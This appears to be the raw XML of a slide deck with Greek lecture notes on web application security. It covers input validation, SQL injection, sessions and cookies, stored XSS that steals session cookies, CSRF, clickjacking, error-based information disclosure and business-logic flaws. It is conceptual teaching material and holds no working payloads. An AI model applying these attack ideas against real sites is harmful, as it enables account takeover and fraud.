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95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide91.xml"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide46.xml"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide90.xml"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide49.xml"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide48.xml"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide92.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 name="Shape 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Κατ επέκταση..</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="el"/>
              <a:t>Με το cloud computing </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="el"/>
              <a:t>Πολλα είδη clients</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="el"/>
              <a:t>Οι περισσότεροι web server είναι  συνδεδεμένοι μεταξύ τους με API </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="el">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>οπότε αμα γίνει κάποιος server γίνει compromise τότε βλέπουμε οτι δεν είναι δύσκολο να κάνουμε ένα hop με κάποιο vulnerability στον επόμενο κλπ</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="el"/>
              <a:t>αντίστοφα αν εμπιστευτούμε πολλά permissions σε κάποιον άλλο server μπορεί να γίνει το ίδιο</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" marR="0" rtl="0" algn="l">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lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="el">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Οι εισβολείς είναι παντού οπότε πρέπει να προστατευόμαστε σε κάθε επίπεδο</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="el">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Μικρή εμπειρία στα δίκτυα -&gt; Αpplication layer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Ποιος είναι κλασσικός client side validation τρόπος? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="el"/>
              <a:t>Ποσο εύκολα απενεργοποιείται?</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Server side validation</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="el"/>
            </a:br>
            <a:r>
              <a:rPr lang="el"/>
              <a:t>Αν έχουμε χωρίσει το security/validation του κώδικα μας σε 100 modules σε 100 μερη τότε είναι πολύ δύσκολο να τα ελεγξουμε</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="el"/>
              <a:t>μπορεί να μας ξεφύγει κάτι</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2 βασικές προσεγγίσεις</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="el"/>
              <a:t>επιλέγω τι δεν θέλω και αφήνω να περνάνε όλα τα υπόλοιπα</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="el"/>
              <a:t>επιλέγω τι θέλω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Oπως είπαμε πριν…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="250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Απλή μορφή επίθεσης, όχι πολύ διαδεδομένη </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="el"/>
              <a:t>Αξίζει να την δούμε για να καταλάβουμε την ιδέα του injection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l" sz="1100" u="none" cap="none" strike="noStrike"/>
              <a:t>DO ANO ther EXAMPLE WITH POST and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 name="Shape 3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Ολοι οι χρηστες με όλα τα permissions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l" sz="1100" u="none" cap="none" strike="noStrike"/>
              <a:t>DO ANO ther EXAMPLE WITH POST and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Τι μπουρούμε να κάνουμε για να αξιοποιήσουμε αυτές τις ευπάθειες</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l" sz="1100" u="none" cap="none" strike="noStrike"/>
              <a:t>DO ANO ther EXAMPLE WITH POST and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sql -&gt; πολλά products που είναι και οpensource χρησιμοποιούν αυτή τη γλώσσα mysql postresql, sqlite, nosql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Γίνεται ένα request, γίνεται μια διεργασία στον webserver επιστρέφεται το αποτέλεσμα στον χρήστη</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="el"/>
              <a:t>Σε σχεδόν όλες τις περιπτωσεις όλες τις περιπτώσεις η επικοινωνία γίνεται απο HTTP, HTTPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="el"/>
              <a:t>Οταν δημιουργήθηκε το ΗTTP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4" name="Shape 19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Πρέπει να κρύβουμε στα σφάλματα (Δηλαδή καλό είναι να κάνουμε logging αλλά αυτό να παραμένει στον server)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Aποκαλύπτει μια πληροφορία</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="el"/>
              <a:t>disclosure (information gathering) βιομηχανική κατασκοπία</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="el"/>
            </a:b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Αν αναγκάσουμε τον server να παράξει κάποιο application error.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Οταν δημιουργήθηκε το προτόκολλο HTTP δεν είχε αναφερθεί καθόλου ο τομέας της ασφάλειας 1989 cern</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="el"/>
              <a:t>O καθένας μπορούσε πάνω στο δικτυο να διαβάσει/πειράξει τα requests που γίνονται στον web server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="el"/>
              <a:t>με https τα προβλήματα λύθηκαν</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="el"/>
              <a:t>Ακόμα και με ασφαλές προτόκολλο επικοινωνίας οι επιθέσεις που θα δείξουμε είναι μέσα στο HTTP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="el"/>
              <a:t>Δεν μπορούμε να στηριχθούμε στο encryption της επικοινωνίας</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="250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business layer != data layer</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l"/>
              <a:t>separation of concerns</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l"/>
              <a:t>Οποιοδήποτε vulnerability δεν επηρεάζει το άλλο layer</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6" name="Shape 2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Ας δούμε κάποιες βασικές έννοιες</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7" name="Shape 2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Διάφορα resources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3" name="Shape 2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stateless = δεν έχει μνήμη </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l"/>
              <a:t>persistent ή no persistent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="el"/>
              <a:t>secure cookies</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l"/>
              <a:t>Αν έκανα ένα request στο facebook και συνδεόμουν και έκανα ένα άλλο request τότε το facebook δεν θα χε τρόπο να καταλάβει οτι έχω ξανασυνδεθεί</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0" name="Shape 3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ajax request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6" name="Shape 3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l" sz="1100" u="none" cap="none" strike="noStrike"/>
              <a:t>Define Same Origin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2" name="Shape 3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8" name="Shape 3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Προσπαθεί να εκμεταλλευτεί αυτά ακριβώς τα elements που δεν περιορίζεται</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="250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4" name="Shape 3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1" name="Shape 3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8" name="Shape 3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4" name="Shape 3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Κάνει inject το κακόβουλο κώδικα στην σελίδα και στην συνέχεια με κάποιο τρόπο αποθηκεύεται στον server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="el"/>
              <a:t>Οταν κάποιος client θύμα προσπαθήσει ζητήσει κάποια σελίδα, τότε αυτή θα περιέχει τον κακόβουλο κώδικα</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="el"/>
              <a:t>Και τότε ο attacker έχει πρόσβαση javascript στο μηχάνημα του θύματος</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="el"/>
            </a:b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Ο κώδικας αυτός μπορεί να στέλνει δεδομένα του χρήστη για παράδειγμα τα cookies απο κάποιο session</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5" name="Shape 3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l" sz="1100" u="none" cap="none" strike="noStrike"/>
              <a:t>DO ANO ther EXAMPLE WITH POST and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0" name="Shape 36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7" name="Shape 3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5" name="Shape 3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inject ένα iframe</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0" name="Shape 3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Εισάγουμε κάποιο image το </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="el"/>
              <a:t>document cookie =&gt; ολα τα cookies που περιέχει ένα domain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="el"/>
              <a:t>Τι γίνεται όταν κάποιος κάνει filtering τα quotes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6" name="Shape 3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2" name="Shape 3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8" name="Shape 3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πολύ καλό να το κάνετε για penetration testing</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5" name="Shape 40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καμμια ιδέα?</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0" name="Shape 4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Εργαλεία που βρίσκουν μοτίβα που μπορεί να είναι εβάλωτα</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6" name="Shape 4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Http όπως είπαμε είναι stateless. Οπότε κάποια εφαρμογή για να κάνει authenticate το χρήστη χρησιμοποιεί sessions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1" name="Shape 42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TO SESSION ΠΡΕΠΕΙ ΝΑ ΕΙΝΑΙ ΨΕΥΔΟΤΥΧΑΙΟ ΚΑΙ ΝΑ ΜΗΝ ΕΙΝΑΙ PREDICTABLE</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7" name="Shape 4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Ο κάθε χρήστης έχει πρόσβαση να αλλάξει ότι βλέπουμε εδω πέρα</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3" name="Shape 4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man in the middle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9" name="Shape 4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5" name="Shape 4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0" name="Shape 4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Εστω οτι εγώ μπορώ να πείσω τον χρήστη απο τον browser του να κάνει κάποιο request τότε θα περιέχονται όλα τα cookies του browser του.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="el"/>
              <a:t>Τότε πείθοντας τον χρήστη να μπεί σε μια σελίδα μου μπορώ να κάνω embed κάποια φόρμα ή κάποιο script που τρέχει το request</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6" name="Shape 4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3" name="Shape 4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οι εικόνες για παράδειγμα κατεβαίνουν απο get</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9" name="Shape 4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8" name="Shape 4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4" name="Shape 4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9" name="Shape 4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Μια βασική αρχή</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5" name="Shape 4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2" name="Shape 50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HTTP_HEADER που απαγορεύει την σελίδα σου να μπεί σε σαν iframe</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8" name="Shape 5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br>
              <a:rPr lang="el"/>
            </a:br>
            <a:r>
              <a:rPr lang="el"/>
              <a:t>Μια ενδιαφέρουσα επίθεση </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3" name="Shape 51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0" name="Shape 5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Βαζουμε μια σελίδα που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6" name="Shape 52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1" name="Shape 5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7" name="Shape 5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l" sz="1100" u="none" cap="none" strike="noStrike"/>
              <a:t>Τράπεζα Πειραιώς</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4" name="Shape 5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lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="el">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Για παράδειγμα σε κάποια εφαρμογή αν πλήρωνες με κάρτα ή μέ κάποιο discount code τότε σου αφαιρεί Χ ευρω. Αν αγόραζες προιόν αξίας X ευρώ τότε μπορούσες να αγοράσεις το προιόν δωρεάν</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="el">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3 φορες εφαλμένα τον κωδικό Web banking πριν γίνει 24ωρο</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>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9" name="Shape 5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l"/>
              <a:t>ΜΙα web εφαρμογή</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5" name="Shape 5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1" name="Shape 5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7" name="Shape 5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1"/>
            <a:ext cx="7772400" cy="1159798"/>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1" i="0" sz="4800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="0" lvl="1" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr b="1" sz="4800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="0" lvl="2" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr b="1" sz="4800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="0" lvl="3" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr b="1" sz="4800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="0" lvl="4" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr b="1" sz="4800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="0" lvl="5" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr b="1" sz="4800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr indent="0" lvl="6" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr b="1" sz="4800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr indent="0" lvl="7" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr b="1" sz="4800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr indent="0" lvl="8" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr b="1" sz="4800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Shape 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2840052"/>
            <a:ext cx="7772400" cy="784798"/>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0" lvl="1" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr b="1" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="0" lvl="2" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr b="1" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="0" lvl="3" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr b="1" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="0" lvl="4" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr b="1" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="0" lvl="5" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr b="1" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr indent="0" lvl="6" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr b="1" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr indent="0" lvl="7" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr b="1" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr indent="0" lvl="8" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr b="1" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Shape 13"/>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30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0" lvl="1" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr b="1" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="0" lvl="2" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr b="1" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="0" lvl="3" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr b="1" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="0" lvl="4" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr b="1" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="0" lvl="5" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr b="1" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr indent="0" lvl="6" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr b="1" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr indent="0" lvl="7" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr b="1" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr indent="0" lvl="8" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
